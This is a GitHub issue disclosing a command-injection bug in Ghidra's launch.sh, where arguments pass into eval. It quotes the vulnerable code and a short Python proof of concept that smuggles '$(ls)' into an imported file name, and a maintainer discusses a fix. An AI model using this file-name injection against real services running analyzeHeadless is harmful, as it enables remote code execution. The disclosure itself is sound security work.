Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Command injection in launch.sh #4869

Closed
attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872
Closed

Command injection in launch.sh #4869

attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872

Comments

@attilaszia
Copy link

Describe the bug
/Ghidra/RuntimeScripts/Linux/support/launch.sh passes user provided input into eval. This results in straightforward command injection.

There are a couple of security SaaS's that use analyzeHeadless as part of a service, so this is a pretty surprising RCE on natural-looking invocations.

https://github.com/NationalSecurityAgency/ghidra/blob/master/Ghidra/RuntimeScripts/Linux/support/launch.sh#L192

if [ "${BACKGROUND}" = true ]; then
	eval "\"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]}" &>/dev/null &
	
	# If our process dies immediately, output something so the user knows to run in debug mode.
	# Otherwise they'll never see any error output from background mode.
	# Doing a kill -0 sends a no-op signal, which can be used to see if the process is still alive.
	PID=$!
	sleep 1
	if ! kill -0 ${PID} &>/dev/null; then
		echo "Exited with error.  Run in foreground (fg) mode for more details."
		exit 1
	fi
	exit 0
else
	eval "(set -o noglob; \"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]})"
	exit $?
fi

To Reproduce

import subprocess

with open('/bin/bash', 'rb') as f:
    data = f.read()

with open('./$(ls).bin', 'wb') as g:
    g.write(data)

command = ['analyzeHeadless','./','poc','-import','./$(ls).bin']
subprocess.call(command, shell=False)
@ryanmkurtz
Copy link
Collaborator

I think eval was introduced to handle spaces in the VMARGS variable. I'm currently exploring alternative implementations that don't use eval, but suggestions are welcome for that VMARGS/spaces issue.

@ryanmkurtz ryanmkurtz linked a pull request Jan 5, 2023 that will close this issue
@ryanmkurtz ryanmkurtz added Status: Internal This is being tracked internally by the Ghidra team and removed Status: Triage Information is being gathered labels Jan 6, 2023
@ryanmkurtz ryanmkurtz added this to the 10.2.3 milestone Jan 10, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants